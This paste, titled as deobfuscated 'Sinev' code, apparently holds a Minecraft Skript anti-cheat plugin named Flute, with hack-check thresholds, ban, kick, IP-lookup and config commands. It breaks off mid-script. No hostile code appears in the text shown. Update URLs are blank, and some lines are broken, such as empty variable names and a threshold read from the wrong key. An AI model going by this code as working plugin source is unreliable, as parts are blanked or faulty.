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Deobfuscated "Sinev"

a guest
Feb 10th, 2019
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  1. #=======================================================
  2. # Flute | Anti-Cheat =
  3. # by GotPower =
  4. #=======================================================
  5. on join:
  6. set {version} to "1.0"
  7. set {link} to ""
  8. player has permission "flute.admin":
  9. wait 3 seconds
  10. if text from "" = "%{version}%":
  11. stop
  12. else:
  13. set {vers} to text from ""
  14. send "&3-----------------------------------------" to player
  15. send "%{logo}% &7I have found an update for my file" to player
  16. send "&7You can download it at: &6%{link}%" to player
  17. send "&7Current version: &6%{version}%" to player
  18. send "&7Newest version: &6%{vers}%" to player
  19. send "&7Thank you for using &3Flute AC" to player
  20. send "&3-----------------------------------------" to player
  21. stop
  22. on load:
  23. #-------------------------
  24. # Main file
  25. #-------------------------
  26. if folder "plugins/Flute" doesn't exists:
  27. create folder "plugins/Flute"
  28. #-------------------------
  29. # Languages file
  30. #-------------------------
  31. if folder "plugins/Flute/languages" doesn't exists:
  32. create folder "plugins/Flute/languages"
  33. #-------------------------
  34. # Config
  35. #-------------------------
  36. if file "plugins/Flute/config.yml" doesn't exists:
  37. create file "plugins/Flute/config.yml"
  38. wf "##Flute | Anti-Cheat" to "plugins/Flute/config.yml"
  39. wf "##Main settings:" to "plugins/Flute/config.yml"
  40. set "Logo" to "&7[&4?&7]&3&lFlute&7ยป" in yaml file "plugins/Flute/config.yml"
  41. wf "##Flute banning?" to "plugins/Flute/config.yml"
  42. wf "##Leave this to true if you are not using other plugin for banning!" to "plugins/Flute/config.yml"
  43. set "Flute banning" to "true" in yaml file "plugins/Flute/config.yml"
  44. wf "##If above is false no need for this to be changed!" to "plugins/Flute/config.yml"
  45. wf "##Do not add stuff such as player and reason, they will be auto added!" to "plugins/Flute/config.yml"
  46. set "Custom Ban CMD" to "/ban" in yaml file "plugins/Flute/config.yml"
  47. wf "##Ban messages" to "plugins/Flute/config.yml"
  48. set "BanMSG" to "&3&lFlute&7ยป &2You are banned for &e" in yaml file "plugins/Flute/config.yml"
  49. set "BanMSG 2" to "&2You can appeal at: &" in yaml file "plugins/Flute/config.yml"
  50. set "BanMSG 3" to "&3Flute AC &6by GotPower" in yaml file "plugins/Flute/config.yml"
  51. #-------------------------
  52. # Checks
  53. #-------------------------
  54. if file "plugins/Flute/checks.yml" doesn't exists:
  55. create file "plugins/Flute/checks.yml"
  56. wf "##Checks:" to "plugins/Flute/checks.yml"
  57. wf "##(After how many checks should players get auto banned?)" to "plugins/Flute/checks.yml"
  58. set "Kill Aura Checks" to "10" in yaml file "plugins/Flute/checks.yml"
  59. set "Auto Clicker Checks" to "10" in yaml file "plugins/Flute/checks.yml"
  60. set "Fly Checks" to "20" in yaml file "plugins/Flute/checks.yml"
  61. set "Jesus Checks" to "20" in yaml file "plugins/Flute/checks.yml"
  62. set "Speed Checks" to "20" in yaml file "plugins/Flute/checks.yml"
  63. set "AntiKB Checks" to "10" in yaml file "plugins/Flute/checks.yml"
  64. set "Phase Checks" to "10" in yaml file "plugins/Flute/checks.yml"
  65. set "Auto Sneak Checks" to "15" in yaml file "plugins/Flute/checks.yml"
  66. set "Fast Build Checks" to "20" in yaml file "plugins/Flute/checks.yml"
  67. set "Fast Break Checks" to "20" in yaml file "plugins/Flute/checks.yml"
  68. set "Fast Bow Checks" to "10" in yaml file "plugins/Flute/checks.yml"
  69. set "Multi Aura Checks" to "10" in yaml file "plugins/Flute/checks.yml"
  70. #-------------------------
  71. # Settings
  72. #-------------------------
  73. if file "plugins/Flute/settings.yml" doesn't exists:
  74. create file "plugins/Flute/settings.yml"
  75. wf "##Settings for certain hacks" to "plugins/Flute/settings.yml"
  76. set "Max Ping" to "200" in yaml file "plugins/Flute/settings.yml"
  77. set "Kill Aura range" to "5.31" in yaml file "plugins/Flute/settings.yml"
  78. set "Max Clicks per second" to "17" in yaml file "plugins/Flute/settings.yml"
  79. set "Max speed of eating (seconds)" to "1.65" in yaml file "plugins/Flute/settings.yml"
  80. set "Max speed of regenerating (seconds)" to "0.5" in yaml file "plugins/Flute/settings.yml"
  81. set "Max speed of breaking blocks (seconds)" to "0.13" in yaml file "plugins/Flute/settings.yml"
  82. set "Max speed of placing blocks (seconds)" to "0.13" in yaml file "plugins/Flute/settings.yml"
  83. set "Max speed of shooting arrows (seconds)" to "0.195" in yaml file "plugins/Flute/settings.yml"
  84. set "Max speed of moving per second (blocks)" to "8" in yaml file "plugins/Flute/settings.yml"
  85. set "Anti Bot" to "true" in yaml file "plugins/Flute/settings.yml"
  86. #-------------------------
  87. # Messages
  88. #-------------------------
  89. if file "plugins/Flute/messages.yml" doesn't exists:
  90. create file "plugins/Flute/messages.yml"
  91. wf "##Messages for certain hacks" to "plugins/Flute/messages.yml"
  92. set "Check reports 1" to "&2Make sure to type: &e/reports <hack>" in yaml file "plugins/Flute/messages.yml"
  93. set "Check reports 2" to "&a(killaura, reach, fly, jesus, antikb, speed, fastbuild, fastbreak)" in yaml file "plugins/Flute/messages.yml"
  94. set "Report sent" to "&aReport has been sent!" in yaml file "plugins/Flute/messages.yml"
  95. set "Cleared reports" to "&aReports have been cleared!" in yaml file "plugins/Flute/messages.yml"
  96. set "Unsolved reports" to "&eUnsolved reports:" in yaml file "plugins/Flute/messages.yml"
  97. set "Main alert color 1" to "&2" in yaml file "plugins/Flute/messages.yml"
  98. set "Main alert color 2" to "&7" in yaml file "plugins/Flute/messages.yml"
  99. set "Main alert color 3" to "&a" in yaml file "plugins/Flute/messages.yml"
  100. set "Cannot ban" to "&cYou cannot ban this player!" in yaml file "plugins/Flute/messages.yml"
  101. set "Cannot kick" to "&cYou cannot kick this player!" in yaml file "plugins/Flute/messages.yml"
  102. set "Reset checks" to "&aReset stats of player!" in yaml file "plugins/Flute/messages.yml"
  103. set "Unbanned" to "&ewas unbanned by &a" in yaml file "plugins/Flute/messages.yml"
  104. set "Correct 1" to "&cPlease use &e/Flute ban <playername> <reason>" in yaml file "plugins/Flute/messages.yml"
  105. set "Correct 2" to "&cPlease use &e/Flute reset <playername>" in yaml file "plugins/Flute/messages.yml"
  106. set "Correct 3" to "&cPlease use &e/Flute unban <playername>" in yaml file "plugins/Flute/messages.yml"
  107. set "Correct 4" to "&cPlease use &e/Flute ip <playername>" in yaml file "plugins/Flute/messages.yml"
  108. set "Correct 5" to "&cPlease use &e/Flute kick <playername> <reason>" in yaml file "plugins/Flute/messages.yml"
  109. set "Alerts false" to "&eYou will no longer recieve alerts!" in yaml file "plugins/Flute/messages.yml"
  110. set "Alerts true" to "&eYou will now recieve alerts!" in yaml file "plugins/Flute/messages.yml"
  111. set "Total banned" to "&aTotal banned amount: &e" in yaml file "plugins/Flute/messages.yml"
  112. set "Help 1" to "&f&m---------[&3Flute&f&m]---------" in yaml file "plugins/Flute/messages.yml"
  113. set "Help 2" to "&3/Flute &fconfig" in yaml file "plugins/Flute/messages.yml"
  114. set "Help 3" to "&3/Flute &fjudgemental" in yaml file "plugins/Flute/messages.yml"
  115. set "Help 4" to "&3/Flute &ftestkb <player>" in yaml file "plugins/Flute/messages.yml"
  116. set "Help 5" to "&3/Flute &fban <player> <hack>" in yaml file "plugins/Flute/messages.yml"
  117. set "Help 6" to "&3/Flute &fkick <player> <reason>" in yaml file "plugins/Flute/messages.yml"
  118. set "Help 7" to "&3/Flute &freset <player>" in yaml file "plugins/Flute/messages.yml"
  119. set "Help 8" to "&3/Flute &fnotify" in yaml file "plugins/Flute/messages.yml"
  120. set "Help 9" to "&3/check &f<player>" in yaml file "plugins/Flute/messages.yml"
  121. set "Help 10" to "&f&m---------[&3Flute&f&m]---------" in yaml file "plugins/Flute/messages.yml"
  122. set "Banning mode" to "&7Banning mode is now set to " in yaml file "plugins/Flute/messages.yml"
  123. set "Settings off" to "Banwave &7is now turned &2OFF" in yaml file "plugins/Flute/messages.yml"
  124. set "Settings on" to "Banwave &7is now turned &2ON" in yaml file "plugins/Flute/messages.yml"
  125. set "Hack off" to "&7is now turned &2OFF" in yaml file "plugins/Flute/messages.yml"
  126. set "Hack on" to "&7is now turned &2ON" in yaml file "plugins/Flute/messages.yml"
  127. set "Judgemental broadcast" to "&7I am starting &6&lJudgemental &7day! (&aGood luck!&7)" in yaml file "plugins/Flute/messages.yml"
  128. set "Judgemental broadcast fail" to "&6Judgemental &7mode is disabled in &c/flute config" in yaml file "plugins/Flute/messages.yml"
  129. #-------------------------
  130. # Messages variables
  131. #-------------------------
  132. set {checkreports1} to single value "Check reports 1" get of "plugins/Flute/messages.yml"
  133. set {checkreports2} to single value "Check reports 2" get of "plugins/Flute/messages.yml"
  134. set {reportsent} to single value "Report sent" get of "plugins/Flute/messages.yml"
  135. set {reportscleared} to single value "Cleared reports" get of "plugins/Flute/messages.yml"
  136. set {unsolved} to single value "Unsolved reports" get of "plugins/Flute/messages.yml"
  137. #
  138. set {maincolor1} to single value "Main alert color 1" get of "plugins/Flute/messages.yml"
  139. set {maincolor2} to single value "Main alert color 2" get of "plugins/Flute/messages.yml"
  140. set {maincolor3} to single value "Main alert color 3" get of "plugins/Flute/messages.yml"
  141. #
  142. set {cannotban} to single value "Cannot ban" get of "plugins/Flute/messages.yml"
  143. set {cannotkick} to single value "Cannot kick" get of "plugins/Flute/messages.yml"
  144. #
  145. set {resetchecks} to single value "Reset checks" get of "plugins/Flute/messages.yml"
  146. set {unbanned} to single value "Unbanned" get of "plugins/Flute/messages.yml"
  147. #
  148. set {correct1} to single value "Correct 1" get of "plugins/Flute/messages.yml"
  149. set {correct2} to single value "Correct 2" get of "plugins/Flute/messages.yml"
  150. set {correct3} to single value "Correct 3" get of "plugins/Flute/messages.yml"
  151. set {correct4} to single value "Correct 4" get of "plugins/Flute/messages.yml"
  152. #
  153. set {alertsfalse} to single value "Alerts false" get of "plugins/Flute/messages.yml"
  154. set {alertstrue} to single value "Alerts true" get of "plugins/Flute/messages.yml"
  155. #
  156. set {totalbanned} to single value "Total banned" get of "plugins/Flute/messages.yml"
  157. #
  158. set {help1} to single value "Help 1" get of "plugins/Flute/messages.yml"
  159. set {help2} to single value "Help 2" get of "plugins/Flute/messages.yml"
  160. set {help3} to single value "Help 3" get of "plugins/Flute/messages.yml"
  161. set {help4} to single value "Help 4" get of "plugins/Flute/messages.yml"
  162. set {help5} to single value "Help 5" get of "plugins/Flute/messages.yml"
  163. set {help6} to single value "Help 6" get of "plugins/Flute/messages.yml"
  164. set {help7} to single value "Help 7" get of "plugins/Flute/messages.yml"
  165. set {help8} to single value "Help 8" get of "plugins/Flute/messages.yml"
  166. set {help9} to single value "Help 9" get of "plugins/Flute/messages.yml"
  167. set {help10} to single value "Help 10" get of "plugins/Flute/messages.yml"
  168. set {banningmode} to single value "Banning mode" get of "plugins/Flute/messages.yml"
  169. set {bansettingsoff} to single value "Settings off" get of "plugins/Flute/messages.yml"
  170. set {bansettingson} to single value "Settings on" get of "plugins/Flute/messages.yml"
  171. set {hackoff} to single value "Hack off" get of "plugins/Flute/messages.yml"
  172. set {hackon} to single value "Hack on" get of "plugins/Flute/messages.yml"
  173. set {judgementalstart} to single value "Judgemental broadcast" get of "plugins/Flute/messages.yml"
  174. set {judgementalfail} to single value "Judgemental broadcast fail" get of "plugins/Flute/messages.yml"
  175. #-------------------------
  176. # Config variables
  177. #-------------------------
  178. set {logo} to single value "Logo" get of "plugins/Flute/config.yml"
  179. set {banmsg} to single value "BanMSG" get of "plugins/Flute/config.yml"
  180. set {banmsg2} to single value "BanMSG 2" get of "plugins/Flute/config.yml"
  181. set {banmsg3} to single value "BanMSG 3" get of "plugins/Flute/config.yml"
  182. set {fluteban} to single value "Flute banning" get of "plugins/Flute/config.yml"
  183. set {customcmd} to single value "Custom Ban CMD" get of "plugins/Flute/config.yml"
  184. #-------------------------
  185. # Checks variables
  186. #-------------------------
  187. set {kachecks} to single value "Kill Aura Checks" get of "plugins/Flute/checks.yml"
  188. set {fastplacechecks} to single value "Fast Build Checks" get of "plugins/Flute/checks.yml"
  189. set {fastbreakchecks} to single value "Fast Break Checks" get of "plugins/Flute/checks.yml"
  190. set {fastbowchecks} to single value "Fast Bow Checks" get of "plugins/Flute/checks.yml"
  191. set {autoclickerchecks} to single value "Auto Clicker Checks" get of "plugins/Flute/checks.yml"
  192. set {flychecks} to single value "Fly Checks" get of "plugins/Flute/checks.yml"
  193. set {jesuschecks} to single value "Jesus Checks" get of "plugins/Flute/checks.yml"
  194. set {speedchecks} to single value "Speed Checks" get of "plugins/Flute/checks.yml"
  195. set {antikbchecks} to single value "AntiKB Checks" get of "plugins/Flute/checks.yml"
  196. set {phasechecks} to single value "Phase Checks" get of "plugins/Flute/checks.yml"
  197. set {autosneakchecks} to single value "Auto Sneak Checks" get of "plugins/Flute/checks.yml"
  198. set {multiaurachecks} to single value "Auto Sneak Checks" get of "plugins/Flute/checks.yml"
  199. #-------------------------
  200. # Settings variables
  201. #-------------------------
  202. set {antibot} to single value "Anti Bot" get of "plugins/Flute/settings.yml"
  203. set {maxping} to single value "Max Ping" get of "plugins/Flute/settings.yml"
  204. set {range} to single value "Kill Aura range" get of "plugins/Flute/settings.yml"
  205. set {maxclicks} to single value "Max Clicks per second" get of "plugins/Flute/settings.yml"
  206. set {eatticks} to single value "Max speed of eating (seconds)" get of "plugins/Flute/settings.yml"
  207. set {regenticks} to single value "Max speed of regenerating (seconds)" get of "plugins/Flute/settings.yml"
  208. set {fastbreakticks} to single value "Max speed of breaking blocks (seconds)" get of "plugins/Flute/settings.yml"
  209. set {fastplaceticks} to single value "Max speed of placing blocks (seconds)" get of "plugins/Flute/settings.yml"
  210. set {fastbowticks} to single value "Max speed of shooting arrows (seconds)" get of "plugins/Flute/settings.yml"
  211. set {speedblocks} to single value "Max speed of moving per second (blocks)" get of "plugins/Flute/settings.yml"
  212. set {antibot} to single value "Anti Bot" get of "plugins/Flute/settings.yml"
  213. on script load:
  214. if {sub2pewd.unsubtseries} is not set:
  215. set {flute.killaura.ban} to true
  216. set {flute.autoclicker.ban} to true
  217. set {flute.speed.ban} to true
  218. set {} to true
  219. set {flute.jesus.ban} to true
  220. set {flute.fastbow.ban} to true
  221. set {flute.fastbreak.ban} to true
  222. set {flute.fastplace.ban} to true
  223. set {flute.antikb.ban} to true
  224. set {flute.autosneak.ban} to true
  225. set {flute.scaffold.ban} to true
  226. set {flute.tower.ban} to true
  227. set {flute.killaura} to true
  228. set {flute.fastbow} to true
  229. set {} to true
  230. set {flute.jesus} to true
  231. set {flute.speed} to false
  232. set {flute.antikb} to true
  233. set {flute.regen} to true
  234. set {} to true
  235. set {flute.fastbb} to true
  236. set {flute.phase} to true
  237. set {flute.selfharm} to true
  238. set {flute.banwave} to true
  239. set {flute.bhp} to true
  240. set {flute.autosneak} to true
  241. set {flute.autoclicker} to true
  242. set {flute.nofall} to true
  243. set {flute.scaffold} to true
  244. set {flute.tower} to true
  245. set {flute.highjump} to true
  246. set {banned.flute} to 0
  247. set {flute.broadcast} to true
  248. set {flute.enabled} to true
  249. set {sub2pewd.unsubtseries} to true
  250. on load:
  251. if {flute.bantype} is not set:
  252. set {flute.bantype} to "banwave"
  253. stop
  254. on join:
  255. if {set.%player%} is not set:
  256. set {killaura.%player%} to 0
  257. set {multiaura.%player%} to 0
  258. set {set.%player%} to true
  259. set {antikb.%player%} to 0
  260. set {sneaking.%player%} to 0
  261. set {fastplace.%player%} to 0
  262. set {fastbreak.%player%} to 0
  263. set {fly.%player%} to 0
  264. set {jesus.%player%} to 0
  265. set {fastbow.%player%} to 0
  266. set {autoclicker.%player%} to 0
  267. set {bhp.%player%} to 0
  268. set {highjump.%player%} to 0
  269. set {tower.%player%} to 0
  270. set {scaffold.%player%} to 0
  271. set {nofall.%player%} to 0
  272. set {multichecker.%player%} to 0
  273. set {waittimer.%player%} to 0
  274. set {dban.%player%} to false
  275. stop
  276. on join:
  277. if player has permission "flute.notify":
  278. set {recieve.%player%} to true
  279. stop
  280. on join:
  281. if {antibot} = "true":
  282. set {mov.%player%} to true
  283. wait 20 seconds
  284. if {mov.%player%} is true:
  285. kick the player due to "%{logo}% &2AntiBot &eKick!"
  286. stop
  287. else:
  288. stop
  289. on any movement:
  290. if {mov.%player%} is true:
  291. clear {mov.%player%}
  292. #=======================================================
  293. # Flute | Anti-Cheat =
  294. # Points Reset =
  295. #=======================================================
  296. every 3 minutes:
  297. loop all players:
  298. if {killaura.%loop-player%} > 0:
  299. remove 1 from {killaura.%loop-player%}
  300. if {multiaura.%loop-player%} > 0:
  301. remove 1 from {multiaura.%loop-player%}
  302. if {antikb.%loop-player%} > 0:
  303. remove 1 from {antikb.%loop-player%}
  304. if {sneaking.%loop-player%} > 0:
  305. remove 1 from {sneaking.%loop-player%}
  306. if {fastplace.%loop-player%} > 0:
  307. remove 1 from {fastplace.%loop-player%}
  308. if {fastbreak.%loop-player%} > 0:
  309. remove 1 from {fastbreak.%loop-player%}
  310. if {fly.%loop-player%} > 0:
  311. remove 1 from {fly.%loop-player%}
  312. if {jesus.%loop-player%} > 0:
  313. remove 1 from {jesus.%loop-player%}
  314. if {fastbow.%loop-player%} > 0:
  315. remove 1 from {fastbow.%loop-player%}
  316. if {phase.%loop-player%} > 0:
  317. remove 1 from {phase.%loop-player%}
  318. if {bhp.%loop-player%} > 0:
  319. remove 1 from {bhp.%loop-player%}
  320. every 5 minutes:
  321. if {flute.bantype} = "judgemental":
  322. loop all players:
  323. if {injudgemental.%loop-player%} is not set:
  324. set {_ka} to {kachecks} parsed as number
  325. set {_akb} to {antikbchecks} parsed as number
  326. set {_sneak} to {sneakchecks} parsed as number
  327. set {_fp} to {fastplacechecks} parsed as number
  328. set {_fb} to {fastbreakchecks} parsed as number
  329. set {_fastbow} to {fastbowchecks} parsed as number
  330. set {_fly} to {flychecks} parsed as number
  331. set {_jesus} to {jesuschecks} parsed as number
  332. set {_phase} to {phasechecks} parsed as number
  333. set {_autoclicker} to {autoclickerchecks} parsed as number
  334. set {_speed} to {speedchecks} parsed as number
  335. set {_scaffold} to {scaffoldchecks} parsed as number
  336. set {_tower} to {towerchecks} parsed as number
  337. wait 1 tick
  338. if {killaura.%loop-player%} > {_ka}:
  339. add loop-player to {judgemental::*}
  340. set {injudgemental.%loop-player%} to true
  341. else if {antikb.%loop-player%} > {_akb}:
  342. add loop-player to {judgemental::*}
  343. set {injudgemental.%loop-player%} to true
  344. else if {sneaking.%loop-player%} > {_sneak}:
  345. add loop-player to {judgemental::*}
  346. set {injudgemental.%loop-player%} to true
  347. else if {fastplace.%loop-player%} > {_fp}:
  348. add loop-player to {judgemental::*}
  349. set {injudgemental.%loop-player%} to true
  350. else if {fastbreak.%loop-player%} > {_fb}:
  351. add loop-player to {judgemental::*}
  352. set {injudgemental.%loop-player%} to true
  353. else if {fly.%loop-player%} > {_fly}:
  354. add loop-player to {judgemental::*}
  355. set {injudgemental.%loop-player%} to true
  356. else if {jesus.%loop-player%} > {_jesus}:
  357. add loop-player to {judgemental::*}
  358. set {injudgemental.%loop-player%} to true
  359. else if {fastbow.%loop-player%} > {_fastbow}:
  360. add loop-player to {judgemental::*}
  361. set {injudgemental.%loop-player%} to true
  362. else if {phase.%loop-player%} > {_phase}:
  363. add loop-player to {judgemental::*}
  364. set {injudgemental.%loop-player%} to true
  365. else if {bhp.%loop-player%} > {_speed}:
  366. add loop-player to {judgemental::*}
  367. set {injudgemental.%loop-player%} to true
  368. #=======================================================
  369. # Flute | Anti-Cheat =
  370. # Commands =
  371. #=======================================================
  372. on join:
  373. if {ban.%player%} is set:
  374. set join message to ""
  375. kick player due to "%{ban.%player%}%"
  376. stop
  377. else:
  378. stop
  379. on load:
  380. send "&f-----------------------------------------------" to console
  381. send "%{logo}% &7I am now ready to catch &chackers!" to console
  382. send "&bMake sure to configure everything in game!" to console
  383. send "&bWith &d/flute config &bcommand!" to console
  384. send "&f-----------------------------------------------" to console
  385. command /Flute [<text>] [<offline player>] [<text>]:
  386. permission: flute.admin
  387. aliases: /ac, /anticheat, /t, /fluteac
  388. trigger:
  389. if arg 1 is not set:
  390. message "%{help1}%"
  391. message "%{help2}%"
  392. message "%{help3}%"
  393. message "%{help4}%"
  394. message "%{help5}%"
  395. message "%{help6}%"
  396. message "%{help7}%"
  397. message "%{help8}%"
  398. message "%{help9}%"
  399. message "%{help10}%"
  400. if arg 1 is "help":
  401. message "%{help1}%"
  402. message "%{help2}%"
  403. message "%{help3}%"
  404. message "%{help4}%"
  405. message "%{help5}%"
  406. message "%{help6}%"
  407. message "%{help7}%"
  408. message "%{help8}%"
  409. message "%{help9}%"
  410. message "%{help10}%"
  411. if arg 1 is "debug":
  412. if {flute.debug.mode} is not set:
  413. set {flute.debug.mode} to true
  414. message "%{logo}% &fDebug mode &astarted&f..."
  415. stop
  416. else:
  417. clear {flute.debug.mode}
  418. message "%{logo}% &fDebug mode &cended&f..."
  419. stop
  420. if arg 1 is "ban":
  421. if arg 2 is set:
  422. if arg 3 is set:
  423. if arg 2 has permission "flute.bypass":
  424. message "%{logo}% %{cannotban}%"
  425. else:
  426. strike lightning effect at the arg 2
  427. set {_reason} to arg 3
  428. set {_date} to now
  429. set {_p} to "%player%"
  430. kick arg 2 due to "&2Banned on: &6%{_date}%%new line%&2Banned by: &6%{_p}%%new line%%{banmsg}% %{_reason}%%new line%%{banmsg2}%%new line%%new line%%{banmsg3}%"
  431. if {fluteban} is "true":
  432. set {ban.%arg 2%} to "&2Banned on: &6%{_date}%%new line%&2Banned by: &6%{_p}%%new line%%{banmsg}% %{_reason}%%new line%%{banmsg2}%%new line%%new line%%{banmsg3}%"
  433. else:
  434. execute console command "%{customcmd}% %arg 2% %arg 3%"
  435. stop
  436. set {staffbanned.%arg 2%} to player
  437. if file "plugins/Flute/Banned" doesn't exists:
  438. create folder "plugins/Flute/Banned"
  439. if file "plugins/Flute/Banned/%arg 2%.yml" doesn't exists:
  440. create file "plugins/Flute/Banned/%arg 2%.yml"
  441. wait 1 tick
  442. set "%arg 2%" to "Banned for: %arg 3% | By: %player%" in yaml file "plugins/Flute/Banned/%arg 2%.yml"
  443. if {flute.broadcast} is true:
  444. broadcast "%{logo}% &a%arg 2% &ewas banned by &a%player% &efor &2%arg 3%"
  445. stop
  446. else:
  447. message "%{logo}% %{correct1}%"
  448. stop
  449. else:
  450. message "%{logo}% %{correct1}%"
  451. stop
  452. if arg 1 is "testkb":
  453. if arg 2 is set:
  454. set {_p} to "%arg 2%" parsed as player
  455. message "%{logo}% &7Starting &cAnti KB &7test on &a%{_p}%"
  456. wait 1 second
  457. set {_lp1} to location of {_p}
  458. push {_p} upwards at speed 0.3
  459. push {_p} backwards at speed 0.3
  460. set {_lp2} to location of {_p}
  461. if {_lp1} = {_lp2}:
  462. message "%{logo}% &a%{_p}% &7came out &c&lPOSITIVE for &cAntiKB&7!"
  463. message "&7Make sure to check few more times just in case!"
  464. stop
  465. else:
  466. message "%{logo}% &a%{_p}% &7came out &a&lNEGATIVE for &cAntiKB&7!"
  467. message "&7Make sure to check few more times just in case!"
  468. stop
  469. if arg 1 is "tban":
  470. if arg 2 is set:
  471. if arg 3 is set:
  472. if arg 2 has permission "flute.bypass":
  473. message "%{logo}% &2You cannot ban this player!"
  474. else:
  475. strike lightning effect at the arg 2
  476. set {_reason} to arg 3
  477. add 1 to {banned.flute}
  478. set {_p} to "Flute"
  479. kick arg 2 due to "&2Banned on: &6%{_date}%%new line%&2Banned by: &6%{_p}%%new line%%{banmsg}% %{_reason}%%new line%%{banmsg2}%%new line%%new line%%{banmsg3}%"
  480. if {fluteban} is "true":
  481. set {ban.%arg 2%} to "&2Banned on: &6%{_date}%%new line%&2Banned by: &6%{_p}%%new line%%{banmsg}% %{_reason}%%new line%%{banmsg2}%%new line%%new line%%{banmsg3}%"
  482. else:
  483. execute console command "%{customcmd}% %arg 2% %arg 3%"
  484. stop
  485. set {staffbanned.%arg 2%} to "Flute"
  486. if file "plugins/Flute/Banned" doesn't exists:
  487. create folder "plugins/Flute/Banned"
  488. if file "plugins/Flute/Banned/%arg 2%.yml" doesn't exists:
  489. create file "plugins/Flute/Banned/%arg 2%.yml"
  490. wait 1 tick
  491. set "%arg 2%" to "Banned for: %arg 3% | By: Flute" in yaml file "plugins/Flute/Banned/%arg 2%.yml"
  492. if {flute.broadcast} is true:
  493. broadcast "%{logo}% &a%arg 2% &ewas banned by &3Flute &efor &2%arg 3%"
  494. stop
  495. else:
  496. message "%{logo}% %{correct1}%"
  497. stop
  498. else:
  499. message "%{logo}% %{correct1}%"
  500. stop
  501. if arg 1 is "kick":
  502. if arg 2 is set:
  503. if arg 3 is set:
  504. if arg 2 has permission "flute.bypass":
  505. message "%{logo}% %{cannotkick}%"
  506. else:
  507. kick arg 2 due to "%{logo}% &2You have been kicked by &e%player%! &aReason: &e%arg 3%"
  508. if {flute.broadcast} is true:
  509. broadcast "%{logo}% &a%arg 2% &ewas kicked by &a%player% &efor &2%arg 3%"
  510. else:
  511. message "%{logo}% %{correct5}%"
  512. stop
  513. else:
  514. message "%{logo}% %{correct5}%"
  515. stop
  516. if arg 1 is "reset" or "clear":
  517. if arg 2 is set:
  518. set {killaura.%arg 2%} to 0
  519. set {multiaura.%arg 2%} to 0
  520. set {antikb.%arg 2%} to 0
  521. set {sneaking.%arg 2%} to 0
  522. set {fastplace.%arg 2%} to 0
  523. set {fastbreak.%arg 2%} to 0
  524. set {fly.%arg 2%} to 0
  525. set {autoclicker.%arg 2%} to 0
  526. set {bhp.%arg 2%} to 0
  527. set {jesus.%arg 2%} to 0
  528. set {fastbow.%arg 2%} to 0
  529. set {tower.%arg 2%} to 0
  530. set {scaffold.%arg 2%} to 0
  531. set {banned.%arg 2%} to false
  532. clear {ban.%arg 2%}
  533. message "%{logo}% %{resetchecks}%"
  534. unban arg 2
  535. stop
  536. else:
  537. message "%{logo}% %{correct2}%"
  538. stop
  539. if arg 1 is "unban":
  540. if arg 2 is set:
  541. set {killaura.%arg 2%} to 0
  542. set {multiaura.%arg 2%} to 0
  543. set {antikb.%arg 2%} to 0
  544. set {sneaking.%arg 2%} to 0
  545. set {fastplace.%arg 2%} to 0
  546. set {fastbreak.%arg 2%} to 0
  547. set {autoclicker.%arg 2%} to 0
  548. set {bhp.%arg 2%} to 0
  549. set {fly.%arg 2%} to 0
  550. set {jesus.%arg 2%} to 0
  551. set {fastbow.%arg 2%} to 0
  552. set {tower.%arg 2%} to 0
  553. set {scaffold.%arg 2%} to 0
  554. set {banned.%arg 2%} to false
  555. clear {ban.%arg 2%}
  556. unban arg 2
  557. if {broadcastban} is true:
  558. broadcast "%{logo}% &a%arg 2% %{unbanned}%%player%!"
  559. else:
  560. message "%{logo}% &a%arg 2% was unbanned"
  561. stop
  562. else:
  563. message "%{logo}% %{correct3}%"
  564. stop
  565. if arg 1 is "ip":
  566. if arg 2 is set:
  567. set {_ip} to "%ip of arg 2%"
  568. message "%{logo}% &eIp: &b%{_ip}%"
  569. stop
  570. else:
  571. message "%{logo}% %{correct4}%"
  572. stop
  573. if arg 1 is "notify":
  574. if {recieve.%player%} is true:
  575. set {recieve.%player%} to false
  576. message "%{logo}% %{alertsfalse}%"
  577. stop
  578. else:
  579. set {recieve.%player%} to true
  580. message "%{logo}% %{alertstrue}%"
  581. stop
  582. if arg 1 is "bcast":
  583. broadcast "%{logo}% %arg 2%"
  584. stop
  585. if arg 1 is "banned":
  586. message "%{logo}% %{totalbanned}%%{banned.flute}%"
  587. if arg 1 is "check":
  588. if arg 2 is set:
  589. if {staffbanned.%arg 2%} is set:
  590. message "%{logo}% &a%arg 2% &eWas recently banned by: &a%{staffbanned.%arg 2%}%&e!"
  591. stop
  592. else:
  593. message "%{logo}% &2This player was not banned anytime recently!"
  594. stop
  595. if arg 1 is "config":
  596. wait 1 tick
  597. open chest with 3 row named "&eConfig" to player
  598. if {flute.bantype} is "banwave":
  599. set {_it1} to light green dye
  600. set {_it1name} to "&6&lBan Type &7[&a&lBanWave&7]"
  601. if {flute.bantype} is "judgemental":
  602. set {_it1} to orange dye
  603. set {_it1name} to "&6&lBan Type &7[&6&lJudgemental Day&7]"
  604. if {flute.bantype} is "info":
  605. set {_it1} to pink dye
  606. set {_it1name} to "&6&lBan Type &7[&d&lINFO&7]"
  607. if {flute.bantype} is "none":
  608. set {_it1} to red dye
  609. set {_it1name} to "&6&lBan Type &7[&c&lNONE&7]"
  610. wait 3 ticks
  611. if {flute.broadcast} is true:
  612. set {_it2} to emerald block
  613. set {_it2name} to "&6&lBroadcast &7[&a&lTRUE&7]"
  614. else:
  615. set {_it2} to redstone block
  616. set {_it2name} to "&6&lBroadcast &7[&2&lFALSE&7]"
  617. wait 3 ticks
  618. format slot 0 of player with gray stained glass pane to close
  619. format slot 1 of player with gray stained glass pane to close
  620. format slot 2 of player with gray stained glass pane to close
  621. format slot 3 of player with gray stained glass pane to close
  622. format slot 4 of player with gray stained glass pane to close
  623. format slot 5 of player with gray stained glass pane to close
  624. format slot 6 of player with gray stained glass pane to close
  625. format slot 7 of player with gray stained glass pane to close
  626. format slot 8 of player with gray stained glass pane to close
  627. #-
  628. format slot 9 of player with gray stained glass pane to close
  629. format slot 17 of player with gray stained glass pane to close
  630. #-
  631. format slot 18 of player with gray stained glass pane to close
  632. format slot 19 of player with gray stained glass pane to close
  633. format slot 20 of player with gray stained glass pane to close
  634. format slot 21 of player with gray stained glass pane to close
  635. format slot 23 of player with gray stained glass pane to close
  636. format slot 24 of player with gray stained glass pane to close
  637. format slot 25 of player with gray stained glass pane to close
  638. format slot 26 of player with gray stained glass pane to close
  639. #-
  640. format slot 10 of player with red stained glass pane to close
  641. format slot 12 of player with red stained glass pane to close
  642. format slot 14 of player with red stained glass pane to close
  643. format slot 16 of player with red stained glass pane to close
